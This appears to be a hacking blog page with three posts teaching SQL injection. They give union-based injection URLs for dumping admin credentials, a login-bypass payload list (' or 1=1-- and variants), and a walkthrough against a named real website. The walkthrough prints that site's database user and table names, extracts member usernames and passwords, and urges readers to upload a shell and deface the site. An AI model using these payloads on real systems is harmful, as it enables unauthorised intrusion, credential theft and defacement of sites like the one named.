Showing posts with label SQL. Show all posts
Showing posts with label SQL. Show all posts

Tuesday

SQL Injection with error

Ok in this tutorial I will show you how to hack a website with a MySQL Error ok lets follow this steps and you will get your
destiantion.
1. Check if your target is vulnverable.
http://www.target.com/id=2 //no error
http://www.target.com/id=2# //error or something is missing-> Website is vulnverable
2.column
http://www.target.com/id=2 order by 1 (no error)
http://www.target.com/id=2 order by 2 (no error)
http://www.target.com/id=2 order by 3 (no error)
http://www.target.com/id=2 order by 4 (no error)
http://www.target.com/id=2 order by 5 (errror) --> website has 4 columns if this method dosnt work use oder by 1--
3. Most vunlverable
http://www.target.com/id=2 union select 1, 2, 3, 4 --> if this methode dosnt work use
http://www.target.com/id=2 and 1=2 union select 1, 2, 3, 4--
4. Getting version
http://www.target.com/id=2 union select 1, 2,@@version(),4--
5. Geting Table name
http://www.target.com/id=2 union select 1, 2,group_concat(table_name), 4 from information_schema.tables where table_schema=database()--
6. Getting column
http://www.target.com/id=2 union select 1, 2, GROUP_CONCAT (column_name) ,4, FROM information_schema.columns WHERE table_name=mysqlchar--
now we got the Column names. lets use them
http://www.target.com/id=2 union_select 1, 2, group_concat(admin_id,0x3a,admin_password),4 from admin--

Ok now he have the Adminname and the adminpassword
Now you only have to search the admin login panel and to login.
you can use Acunetix Scanner or Havij to get it
Posted by Kunal Wagh 3 comments
Labels:

Saturday

Today I Teach You SQL Injection Without Error of PHP and MySQL.

1. Find Vulnerable target for that use google dork.
Here is link for that :
http://www.hackforums.net/showthread.php?tid=1210804

2. Next I have found one Target :
http://cadaboutdrugs.ie/news.php?id=82

3. Check for vulnerability put (" ' ") after URL.
http://cadaboutdrugs.ie/news.php?id=82'

4.You cant find any Error Message but You notice some contents of site vanished.

5. Now try for ORDER BY syntax.
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 1--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 2--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 3--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 4--
I have tried upto 90 but I cant Find any Error.

6. Next step to Apply UNION syntax.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7,8--

7. Now at UNION SELECT 1,2,3,4,5,6,7,8-- you will see some vulnerable number on screen e.g. 2 3 4

8. Now found Version of MySQL, User, and Database Name.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,@@version,user(),database(),5,6,7,8--

9. Now you will see the following output :
5.1.49-log ---> MySQL Version

aboutdr_admin@web8.novara.ie ---> User

aboutdr_Test ---> Database Name

10. Now found All tables name in database
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--

11. We got our all table -->[about,carousel,contact,documents,donate,intro,links,members,news,services] in which we got our Important table which stored admin username password is --> "members"

12. Find columns names of "members" table. goto http://home2.paulschou.net/tools/xlate/ website.

13. Copy "members" without quotes into [ TEXT ] field and Press

14. Now We got the value "109 101 109 98 101 114 115" from [ DEC / CHAR ] field.

15. Now our query to find column names of members table will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=CHAR(109,101,109,98,101,114,115)--

16. Now we got all column names from members tables.-->id,username,password

17. Now find username password the query will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(id,0x3a,username,0x3a,password),3,4,5,6,7,8 FROM members--

18. Here we got id, username and password and "0x3a" stands for --> [:] (colon)

19. Now go to Home page of site Click on Admin Login. Login with username password and Upload your shell feel free to deface or upload any page.

I tried this server for root but Unfortunately its patched server so It cant be rooted.
Posted by Kunal Wagh 1 comments
Labels:

Tuesday

How to hack website using sql injection

what is sql injection?

SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its called the coding standard loop hole. some website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. Now assume , you opened a website and went to his Sign in or log in page. Now in username field you have entered something say yogesh and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.

Some basic requirements for sql injection:
1) you need a web browser to open URL and to view source codes.
2) you need notepad++.
3) and very basic queries of sql like insert , select , update , delete etc.

First of all you can hack those website using SQL injection hacks that allows some input fields from the visitor which can provide input to website like log in page , search page, feedback page etc.
Now a days , HTML pages use POST command to send parameter to another ASP/ASPX page.
Therefore, you may not see the parameter in the URL. You can check the source code of the HTML, and look for "FROM" tag in the HTML code. You may find something like this in some HTML codes:



< / F O R M>


Everything between the < F O R M > and < / F O R M > parameters(remove space in words) contains the crucial information and can help us to determine things in more detailed way.



There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:


http://example.com/login.asp?id=10



Now how to detect that this URL is vulnerable or not:
Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:

http://example.com/login.asp?id=hi' or 1=1--




You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:
< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

If your luck is favoring you, you will get the login into the website without any username or password.


But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports
In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.
SELECT * FROM TABLE-NAME WHERE category='sports'
Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like: SELECT * FROM search WHERE category='sports' or 1=1--'

The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='
Posted by Kunal Wagh 3 comments
Labels: , ,
Subscribe to: Posts (Atom)
Related Posts Plugin for WordPress, Blogger...